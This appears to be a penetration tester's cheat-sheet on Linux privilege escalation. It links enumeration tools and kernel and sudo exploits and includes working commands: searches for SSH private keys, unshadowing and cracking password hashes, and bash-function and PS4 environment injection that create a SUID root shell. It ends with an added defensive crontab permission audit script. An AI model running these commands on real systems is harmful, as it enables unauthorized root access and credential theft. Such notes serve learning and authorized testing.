# Linux Privilege Escalation

## Links
* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [LinEnum](https://github.com/rebootuser/LinEnum)
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [GTFObins](https://gtfobins.github.io/) 
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

## Kernel Exploits

### Dirty COW
* [CVE-2016-5195](https://dirtycow.ninja/)
* [c0w.c](../kernel-exploits/dirtycow)

## Stored Keys & Passwords
* History
* Environment Variables 
* Config + Dot Files
* SSH keys
```sh
find / -type f \( -name "authorized_keys" -o -name "id_rsa" \) 2>/dev/null
```

## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passwd /etc/shadow > unshadow.txt`, then crack with john or hashcat.
    * e.g. `john --wordlist=./wordlist --format=crypt hash`
* SUID
    * List SUID/SGID files
    ```sh
    find / -perm /6000 -ls 2>/dev/null
    ```
    * [Shared object injection](../../../exploit/linux/shared_object_injection.md)
    * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
* User specific files
```sh
find / -user root -name "*.txt" 2>/dev/null
```

## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
* `sudo -l` 
    * Take a look at GTFObins
    * Keep an eye on the displayed host and env capabilities 
    
## PATH Hijacking
* Interpositioning binaries via `$PATH`
    * Look for binaries that other binaries and scripts call by name
    * Interpose a binary of the same name and add its directory in front of `$PATH`

## Bash function
* Interpositioning of binaries via bash functions
```sh
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```
```sh
export -f /path/to/binary
```
* Call binary which invokes this function

## Environment Variable
```sh
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
```

## Capabilities
* [capabilities](../../../exploit/linux/capabilities.md)

## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order
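
An added example, not part of the original notes: a read-only audit covering the three crontab checks above. It reads a system crontab (`/etc/crontab` layout with a user field) and reports scheduled commands or their parent directories that are group- or world-writable, commands that depend on `PATH`, and loosely permissioned `PATH` directories. The function names, the output labels and the `/usr/bin:/bin` default are assumptions of this example, and it relies on GNU `find`.

```shell
#!/bin/sh
# Added example: review a system crontab (/etc/crontab layout, with a user field).

# True when the path exists and is writable by group or other. Mode bits are
# used instead of `test -w` so the result is the same when run as root.
# -L follows symlinks (e.g. /bin -> usr/bin). Assumes GNU find (-perm /022).
loose() {
    [ -e "$1" ] && [ -n "$(find -L "$1" -maxdepth 0 -perm /022 2>/dev/null)" ]
}

audit_crontab() {
    file=$1
    path=/usr/bin:/bin                      # assumed cron default if no PATH line
    while read -r line; do
        case $line in
            ''|'#'*) continue ;;
            PATH=*) path=${line#PATH=}; continue ;;
            [A-Za-z_]*=*) continue ;;       # other environment settings
        esac
        set -f; set -- $line; set +f        # split into fields without globbing
        case $1 in @*) skip=2 ;; *) skip=6 ;; esac   # "@reboot user" or 5 fields + user
        [ $# -gt "$skip" ] || continue
        shift "$skip"
        case $1 in
            /*) if loose "$1"; then echo "WRITABLE_CMD $1"; fi
                dir=$(dirname "$1")
                if loose "$dir"; then echo "WRITABLE_DIR $dir"; fi ;;
            *)  echo "RELATIVE_CMD $1" ;;   # resolved through PATH at run time
        esac
    done < "$file"
    # A loose directory early in PATH can shadow binaries in later ones.
    old_ifs=$IFS; IFS=:
    for d in $path; do
        if loose "$d"; then echo "WRITABLE_PATH_DIR $d"; fi
    done
    IFS=$old_ifs
    return 0
}
```

Only the first word of each command is examined, so a wrapper such as `cd / && run-parts ...` is reported as `RELATIVE_CMD cd`. Run it as `audit_crontab /etc/crontab` and fix every reported path by tightening its mode or ownership.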

## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)